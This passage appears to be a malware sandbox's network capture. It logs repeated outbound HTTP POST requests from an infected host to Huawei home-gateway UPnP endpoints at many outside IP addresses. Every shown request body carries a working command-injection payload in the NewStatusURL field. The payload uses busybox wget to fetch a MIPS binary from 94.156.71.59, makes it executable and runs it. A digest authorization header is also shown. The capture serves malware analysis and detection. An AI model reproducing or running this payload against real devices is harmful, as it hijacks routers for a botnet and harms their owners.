                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            214192.168.2.133354041.69.228.20837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.161493063 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            215192.168.2.133769841.34.192.20837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.162235022 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            216192.168.2.1355306156.199.176.16237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.162961006 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            217192.168.2.1360154197.176.59.10437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.163692951 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            218192.168.2.1348850156.202.215.18937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.164438009 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            219192.168.2.133652241.139.140.24337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.165713072 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            220192.168.2.133463241.79.189.4837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.166754961 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            221192.168.2.1359702156.123.237.22137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.167790890 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            222192.168.2.1360102197.140.21.23837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.168828964 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            223192.168.2.1355296156.209.45.10637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.169847965 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
